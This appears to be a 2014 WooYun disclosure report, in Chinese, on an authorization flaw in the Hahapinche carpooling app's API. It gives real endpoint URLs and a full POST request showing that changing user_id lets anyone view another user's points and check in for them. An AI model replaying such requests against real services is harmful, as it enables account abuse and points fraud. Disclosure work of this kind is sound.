当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074794

漏洞标题:哈哈拼车两处越权可刷积分

相关厂商:chepinhui.com

漏洞作者: 啊L川

提交时间:2014-09-02 19:05

修复时间:2014-10-17 19:06

公开时间:2014-10-17 19:06

漏洞类型:未授权访问/权限绕过

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-02: 细节已通知厂商并且等待厂商处理中
2014-09-02: 厂商已经确认,细节仅向厂商公开
2014-09-12: 细节向核心白帽子及相关领域专家公开
2014-09-22: 细节向普通白帽子公开
2014-10-02: 细节向实习白帽子公开
2014-10-17: 细节向公众公开

简要描述:

我的积分功能,可越权查看其他用户的积分,
打开处,没有对用户做判断,可实现全部会员打卡

详细说明:

积分越权
http://api3.hahapinche.com/api.php/Mobile/Html/my_score?user_id=39114 我的积分
http://api3.hahapinche.com/api.php/Mobile/Html/my_score?user_id=39113 此用户开始没有积分 通过帮助用户打卡 用户得到了两个积分,,,
打卡越权
请求

POST /api.php/Mobile/Sign/sign_up HTTP/1.1
Host: api3.hahapinche.com
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Mobile/11D257
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://api3.hahapinche.com/api.php/Mobile/Sign/show_sign_up?user_id=39114&user_token=ae40d6941c1d840e3cfb453da06e8460&hwid=C0448591-7AA5-4A40-975C-1F0425AC31A6
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Content-Length: 35
Origin: http://api3.hahapinche.com
Accept-Encoding: gzip, deflate
user_id=39113&r=0.17960040038451552


改变user_id即可实现打卡 刷积分

漏洞证明:

QQ20140902-6@2x.png


QQ20140902-7@2x.png

修复方案:

加强权限验证

版权声明:转载请注明来源 啊L川@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-02 19:24

厂商回复:

模拟用户签到骗取积分

最新状态:

暂无


漏洞评价:

评论